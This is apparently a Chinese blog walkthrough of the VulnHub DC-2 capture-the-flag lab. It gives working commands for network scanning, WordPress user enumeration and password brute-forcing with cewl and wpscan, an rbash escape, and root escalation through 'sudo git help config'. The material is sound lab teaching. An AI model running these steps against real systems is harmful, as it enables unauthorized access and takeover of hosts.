【DC系列】DC-2靶机渗透教程

环境搭建

VMware和Kali Linux的环境搭建

VMware和Kali Linux的环境搭建我在这里就不说了,具体各种参考我这篇博客

DC-2靶机的搭建

老样子,直接打开这个链接,浏览器就会自动下载DC-2压缩包了
https://download.vulnhub.com/dc/DC-2.zip
这里的具体安装教程就不多说了,可以参考上篇博客

渗透教程

tips:启动的时候可能会显示无法连接ide:0,直接点就行了

接下来开始渗透

收集信息

首先打开命令行,查看kali的ip地址

ip a

我的本机ip是192.168.3.42,然后进行网段扫描

netdiscover -r 192.168.3.0/24#这边的ip是你的ip最后变成0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                                                                                            
                                                                                                                                                                                                                                          
 7 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 420                                                                                                                                                                          
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 ************    *****************      3     180  HUAWEI TECHNOLOGIES CO.,LTD                                                                                                                                                            
 ************    *****************      1      60  Shenzhen JMicron Intelligent Technology Developmen                                                                                                                                     
 ************    *****************      1      60  Luxshare Precision Industry Co., Ltd                                                                                                                                                   
 192.168.3.46    00:0c:29:41:db:6d      1      60  VMware, Inc.                                                                                                                                                                           
 ************    *****************      1      60  Unknown vendor                                                                                                                                                                         

zsh: suspended  sudo netdiscover -r 192.168.3.0/24

可以看到,目标靶机DC-2的ip是192.168.3.46
接下来进行nmap探测

nmap 192.168.3.46 -p- -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-21 06:30 EST
Nmap scan report for dc-2 (192.168.3.46)
Host is up (0.00056s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: DC-2 – Just another WordPress site
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.29 seconds
                                                                

可以看到,目标开放了80网页端口7744ssh端口,先访问一下80端口
80端口

flag1

网页无法被访问,那么我们就要考虑重定向了,也就是说,我们需要更改hosts文件
Windows下的hosts文件位置:C:\Windows\System32\drivers\etc\hosts
Linux下的hosts文件位置:/etc/hosts
为了方便后续渗透,我在Kali中修改

sudo vim /etc/hosts

vim
然后我们按下i键,左下角会显示一个[插入],然后输入以下内容

192.168.3.46 dc-2	ip是靶机的ip

vim
然后我们按esc键,再直接输入:wq,就可以了,然后刷新一下网页,是WordPress
dc-2
然后直接查看flag1
flag1
翻译过来就是:你常用的单词表可能不管用了,所以,或许你只需要很酷(cewl)。密码越多越好,但有时候你可能无法赢得全部。以一个用户身份登录以查看下一个标志。如果你找不到它,就尝试以另一个用户身份登录。
没大看懂,但是有cewl关键词,这是一个字典生成工具
cewl
但是我们要找到登录界面

开始渗透

flag3

用nikto进行探测
nikto
扫描出来后,不难发现,下面有一个WordPress的登录界面的网址

+ /wp-login.php: Wordpress login found.

直接访问
wp-login.php
成功!然后就可以进行字典生成了

cewl http://dc-2 -w ./passwords.txt #passwords.txt名称自订

有了密码,还需要账户,这就需要用到WPScan
WPScan
接下来枚举用户名

wpscan --url http://dc-2 -e u

用户名
成功爆出用户名,给它写到一个文件里面

touch ./users.txt
vim ./users.txt
#users.txt文件名自定

然后按照更改hosts文件的方法,将用户名写到里面

admin
jerry
tom

然后用wpscan进行爆破

wpscan --url http://dc-2 -U ./users.txt -P ./passwords.txt

然后就等待爆用户和密码
用户和密码
然后尝试登录
jerry
在jerry中发现了flag2
flag2
翻译过来就是:如果你无法利用WordPress找到捷径,还有另一种方法。希望你能找到另一个切入点。
这flag还不如没有

flag3

直接尝试ssh登录

ssh jerry@192.168.3.46 -p 7744#192.168.3.46是靶机ip
ssh tom@192.168.3.46 -p 7744#192.168.3.46是靶机ip

因为dc-2不是默认的22ssh端口,所以最后要加上-p 7744,代表ssh端口是7744
jerry没法登,tom可以

tom@DC-2:~$ ls
tom@DC-2:~$ cat flag3.txt

flag3.txt
发现有rbash限制
rbash限制
但是可以用vi啊[doge]

vi ./flag3.txt

flag3
flag3翻译
良心的Kimi啊,直接提示了su命令,可能有限制,但先试试

su jerry

-rbash限制
果然,那就要上rbash逃逸了

flag4

BASH_CMDS[r]=/bin/bash	#设置一个变量为r
r	#执行这个变量

rbash逃逸1
然后设置环境变量

export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

rbash逃逸成功
成功!
直接查看flag4
flag4
翻译一下
翻译
真文明,还配个笑脸 :) 咋感觉有点眼熟
Windows10蓝屏
咳咳,扯远了

final-flag

flag中有一个提示词git,那么应该就是git提权,看下git是不是SUID命令

sudo -l

SUID
可以看到有git,直接提权

sudo git help config

然后输入!/bin/bash
git提权
然后

cd ~
ls
cat final-flag.txt

final-flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值